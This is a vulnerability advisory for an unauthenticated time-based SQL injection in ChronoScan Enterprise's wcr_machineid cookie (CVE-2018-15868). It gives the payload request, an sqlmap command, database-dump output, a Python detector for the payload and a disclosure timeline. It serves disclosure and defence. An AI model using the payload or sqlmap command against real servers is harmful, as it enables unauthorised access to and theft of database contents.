ChronoScan Enterprise Unauthenticated SQL Injection

Background

ChronoScan is OCR software created by ChronoScan Capture S.L., used to read and parse data from the documents it receives. The software takes a document or PDF and, based on how you have it set up, extracts the selected data from the input file. This is especially helpful where an automated process sends a high volume of documents that need to be loaded into a database or some other type of storage quickly. It is offered in community and enterprise versions.

Vulnerability

I've identified an unauthenticated time-based SQL injection on the latest ChronoScan Enterprise version (v1.5.4.3 as of 8-24-2018). This vulnerability has not yet been confirmed on other versions but, due to the nature of the attack (unauthenticated, no specific parameters, etc.), I believe it's present on all versions up to this point. I will update this post when the vendor has confirmed which versions are affected.

The vulnerability lies in how the wcr_machineid cookie is used to identify users and the sessions associated with them. It appears that the wcr_machineid cookie value is inserted unsanitized into a SQL statement that checks the current “machine's” access level. An unauthenticated attacker (even one without a valid wcr_machineid cookie) can exploit this as a time-based SQL injection. Below is the request that was originally used for identification.

GET / HTTP/1.1
Host: vulnerable:10000
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Connection: close
Cache-Control: max-age=0
Referer: http://vulnerable:10000/?wtd=VQWist5qQW3IS6uy
Cookie: wcr_machineid=')waitfor%20delay'0%3a0%3a20'--; wcr_uspw=deleted; wcr_repw=1

If you compare this request (a delay of 20 seconds) to one without the SQL statement, you will see it takes ~20 seconds for the response to come back. I took this and ran the following command in sqlmap which led to confirmation of a vulnerability.

sqlmap -u "http://vulnerable:10000" --cookie="wcr_machineid=*;wcr_uspw=deleted;wcr_repw=1"
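Added here for defenders and not part of the original advisory: a small Python check that URL-decodes the wcr_machineid cookie from request records and flags the T-SQL time-delay and quote/comment pattern visible in the request above. The request records, client addresses and the benign cookie value are constructed sample data.

```python
import re
from urllib.parse import unquote

# T-SQL time-delay primitives used by blind, time-based probes
# (the page's payload decodes to ')waitfor delay'0:0:20'--).
TIME_DELAY_RE = re.compile(r"\bwaitfor\s+(delay|time)\b", re.IGNORECASE)
# A single quote (string-literal break-out) followed later by a T-SQL comment.
QUOTE_THEN_COMMENT_RE = re.compile(r"'.*--", re.DOTALL)

# Constructed sample records: (client address, raw Cookie header). Not real traffic.
SAMPLE_REQUESTS = [
    ("10.0.0.5", "wcr_machineid=A1B2C3D4; wcr_uspw=deleted; wcr_repw=1"),
    ("10.0.0.9", "wcr_machineid=')waitfor%20delay'0%3a0%3a20'--; wcr_uspw=deleted; wcr_repw=1"),
    ("10.0.0.7", "wcr_uspw=deleted; wcr_repw=1"),
]

def parse_cookie_header(header):
    """Split a raw Cookie header into {name: url-decoded value}."""
    cookies = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name.strip()] = unquote(value.strip())
    return cookies

def classify_machineid(value):
    """Return the list of injection indicators found in one wcr_machineid value."""
    findings = []
    if TIME_DELAY_RE.search(value):
        findings.append("tsql-time-delay")
    if QUOTE_THEN_COMMENT_RE.search(value):
        findings.append("quote-breakout-then-comment")
    if value.count("'") % 2 == 1:          # a stray quote that breaks the literal
        findings.append("unbalanced-quote")
    return findings

def scan_requests(requests):
    """Return [(client, decoded value, findings)] for records carrying indicators."""
    hits = []
    for client, header in requests:
        value = parse_cookie_header(header).get("wcr_machineid")
        if value is None:
            continue                        # cookie absent: nothing to inspect
        findings = classify_machineid(value)
        if findings:
            hits.append((client, value, findings))
    return hits

if __name__ == "__main__":
    for client, value, findings in scan_requests(SAMPLE_REQUESTS):
        print(f"{client}: wcr_machineid={value!r} -> {', '.join(findings)}")
```

Pair the pattern match with a response-time comparison against a baseline request, as the advisory does, to confirm a probe actually reached the database.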

After confirmation, I dumped the following databases.

[*] CHRONOSCAN
[*] master
[*] model
[*] msdb
[*] tempdb

Dumping the tables (60 total) from the CHRONOSCAN database gave me the following.

[12:01:33] [INFO] fetching tables for database: CHRONOSCAN
[12:01:33] [INFO] fetching number of tables for database 'CHRONOSCAN'
[12:01:33] [INFO] resumed: 60
[12:01:33] [INFO] resumed: dbo.chrono_Buyers
[12:01:33] [INFO] resumed: dbo.chrono_Suppliers
[12:01:33] [INFO] resumed: dbo.chronosys_csi_export_history
[12:01:33] [INFO] resumed: dbo.chronosys_csi_user_params
[12:01:33] [INFO] resumed: dbo.chronosys_doctype_options
[12:01:33] [INFO] resumed: dbo.chronosys_entities
[12:01:33] [INFO] resumed: dbo.chronosys_entities_params
[12:01:33] [INFO] resumed: dbo.chronosys_entity_masterkey_line_account
[12:01:33] [INFO] resumed: dbo.chronosys_event_track
[12:01:33] [INFO] resumed: dbo.chronosys_job_types_cache
(snip)

Timeline

- August 24, 2018: Vulnerability identified
- August 24, 2018: Vendor notified & acknowledged
- August 24, 2018: CVE ID requested
- August 24, 2018: CVE-2018-15868 reserved
- August 27, 2018: Details provided to MITRE
- August 28, 2018: Vendor issues patch for verification (not public yet)